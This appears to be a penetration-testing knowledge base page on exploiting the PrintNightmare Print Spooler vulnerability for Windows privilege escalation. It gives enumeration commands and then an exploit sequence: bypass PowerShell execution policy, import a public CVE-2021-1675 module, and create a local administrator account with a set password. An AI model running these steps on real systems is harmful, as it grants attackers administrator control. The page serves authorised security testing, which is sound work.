Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 04. Windows / 02. Privilege Escalation / Kernel Exploitation

Print Nightmare

  • This PoC creates a DLL payload remotely or locally using a custom version of Impacket.
  • This PowerShell implementation is good for an easy local privesc.

PrintNightmare refers to vulnerabilities in the Windows Print Spooler service that can allow code execution with elevated privileges under vulnerable configurations.

The Print Spooler runs with high privileges and is commonly present on Windows systems. When vulnerable, it can be abused locally or remotely depending on the target configuration and exploit path.

Enumeration

Check whether the Print Spooler service is running:

Get-Service Spooler

or:

sc query Spooler

Check for the spooler named pipe:

ls \\localhost\pipe\spoolss

If the pipe does not exist, the service is likely not running.

Check Point and Print policy configuration:

reg query "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint"

Interesting findings include:

  • Print Spooler running
  • spoolss pipe accessible
  • Vulnerable Windows build
  • Missing PrintNightmare patches
  • Weak Point and Print restrictions
  • Local privilege escalation path available

Exploit

  1. Confirm the Print Spooler service is running
  2. Confirm the target build is vulnerable
  3. Confirm the exploit path is local or remote
  4. Import the exploit module
  5. Execute the exploit
  6. Verify the resulting privilege change

Bypass PowerShell execution policy for the current process:

Set-ExecutionPolicy Bypass -Scope Process

Import the module:

Import-Module .\CVE-2021-1675.ps1

Add a local administrator user:

Invoke-Nightmare -NewUser "ootw" -NewPassword "Pwnd1234!" -DriverName "PrintIt"

Confirm the user was created:

net user ootw

Confirm local administrator membership:

net localgroup administrators

Adding a local administrator user is noisy. In real assessments, this should only be done when explicitly allowed.